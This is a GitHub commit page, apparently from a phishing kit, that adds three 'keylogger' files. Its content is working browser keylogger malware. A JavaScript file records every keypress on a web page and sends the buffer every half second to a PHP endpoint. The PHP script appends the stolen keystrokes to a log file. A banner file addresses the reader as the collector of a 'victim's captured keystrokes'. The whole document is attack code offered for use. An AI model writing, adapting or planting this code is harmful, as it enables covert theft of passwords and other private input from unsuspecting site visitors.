KEYLOGGER FILES !!!!!

You can delete, these three files from your Server Folder .
If you don't want them.
This commit is contained in:
AnonUD4Y 2018-10-18 21:05:50 +05:30 committed by GitHub
parent f1b3d0d94e
commit 3ec9863d1f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,6 @@
_________________________________________________________________
_________________________________________________________________
HERE IS YOUR VICTIM'S CAPTURED KEYSTROKES
_______________________________________________________________
WORK BY :- ANONUD4Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

14
WebPages/keylogger.js Normal file
View File

@ -0,0 +1,14 @@
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
if(keys != '') {
new Image().src = 'keylogger.php?c='+keys;
keys = '';
}
}, 500);

9
WebPages/keylogger.php Normal file
View File

@ -0,0 +1,9 @@
<?php
// keylogger.php by ANONUD4Y
if(!empty($_GET['c'])) {
$logfile = fopen('KeyloggerData.txt', 'a+');
fwrite($logfile, $_GET['c']);
fclose($logfile);
}
?>